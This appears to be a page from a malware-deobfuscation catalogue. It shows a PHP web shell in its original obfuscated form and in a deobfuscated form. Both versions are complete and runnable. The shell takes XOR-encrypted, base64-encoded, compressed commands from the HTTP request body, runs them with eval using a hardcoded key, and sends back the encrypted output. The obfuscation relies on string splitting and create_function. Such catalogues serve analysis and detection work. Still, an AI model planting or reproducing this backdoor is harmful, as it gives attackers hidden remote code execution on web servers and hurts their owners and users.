Back to listTags
Encodingbase64_decode
base64_encode
Executioneval
Input_GET
Deobfuscated code
<?php
$N = 'k>{$j>};}}r>eturn $o;>}if> (@preg_>match(>"/$kh(.+)$k>f/",@f>ile>_get>_conte';
$W = 'base>64_decode(>>$m[1]),$k)))>;$>o>=@ob_get_co>ntents();@>ob_en>d>_clean()';
$u = 'nt>>s("php://input>"),$m)>==1) {@>ob>_start>();@eva>l(>@gzuncom>press(@x(>@';
$p = 'or($i=0;>$i><$l>;>){for($j=0;>(>$j<$c&&$i>><$l);$j++,$i+>+){$o.=$t{$i>}^$';
$g = "create_function";
$C = ';$r>=@bas>e6>4_encod>e(@x(@gz>com>p>ress($o),$k));p>rin>t("$p$k>h$r$kf");}';
$Y = '9FiQ>Alp>";functio>n x($t,>>$k>){$c=strl>e>n($k);$l=strlen($t);>$o=>"";f';
$r = '$k="b5ef7>3cd";$>kh="5>>ce24f92>1bbc";>$k>f="7fa689200f>f0>";$p="aOWo2>okBR>';
$k = "\$k=\"b5ef73cd\";\$kh=\"5ce24f921bbc\";\$kf=\"7fa689200ff0\";\$p=\"aOWo2okBR9FiQAlp\";function x(\$t,\$k){\$c=strlen(\$k);\$l=strlen(\$t);\$o=\"\";for(\$i=0;\$i<\$l;){for(\$j=0;(\$j<\$c&&\$i<\$l);\$j++,\$i++){\$o.=\$t{\$i}^\$k{\$j};}}return \$o;}if (@preg_match(\"/\$kh(.+)\$kf/\",@file_get_contents(\"php://input\"),\$m)==1) {@ob_start();@eval(@gzuncompress(@x(@base64_decode(\$m[1]),\$k)));\$o=@ob_get_contents();@ob_end_clean();\$r=@base64_encode(@x(@gzcompress(\$o),\$k));print(\"\$p\$kh\$r\$kf\");}";
$G = function () {
$k = "b5ef73cd";
$kh = "5ce24f921bbc";
$kf = "7fa689200ff0";
$p = "aOWo2okBR9FiQAlp";
function x($t, $k)
{
$c = strlen($k);
$l = strlen($t);
$o = "";
for ($i = 0; $i < $l;) {
for ($j = 0; $j < $c && $i < $l; $j++, $i++) {
$o .= $t[$i] ^ $k[$j];
}
}
return $o;
}
if (@preg_match("/5ce24f921bbc(.+)7fa689200ff0/", @file_get_contents("php://input"), $m) == 1) {
@ob_start();
@eval(@gzuncompress(@x(@base64_decode($m[1]), $k)));
$o = @ob_get_contents();
@ob_end_clean();
$r = @base64_encode(@x(@gzcompress($o), $k));
print "{$p}{$kh}{$r}{$kf}";
}
};
$G();
Original code
<?php
$N='k>{$j>};}}r>eturn $o;>}if> (@preg_>match(>"/$kh(.+)$k>f/",@f>ile>_get>_conte';
$W='base>64_decode(>>$m[1]),$k)))>;$>o>=@ob_get_co>ntents();@>ob_en>d>_clean()';
$u='nt>>s("php://input>"),$m)>==1) {@>ob>_start>();@eva>l(>@gzuncom>press(@x(>@';
$p='or($i=0;>$i><$l>;>){for($j=0;>(>$j<$c&&$i>><$l);$j++,$i+>+){$o.=$t{$i>}^$';
$g=str_replace('uX','','cuXruXeauXte_uXfunuXcuXtion');
$C=';$r>=@bas>e6>4_encod>e(@x(@gz>com>p>ress($o),$k));p>rin>t("$p$k>h$r$kf");}';
$Y='9FiQ>Alp>";functio>n x($t,>>$k>){$c=strl>e>n($k);$l=strlen($t);>$o=>"";f';
$r='$k="b5ef7>3cd";$>kh="5>>ce24f92>1bbc";>$k>f="7fa689200f>f0>";$p="aOWo2>okBR>';
$k=str_replace('>','',$r.$Y.$p.$N.$u.$W.$C);
$G=$g('',$k);$G();
?>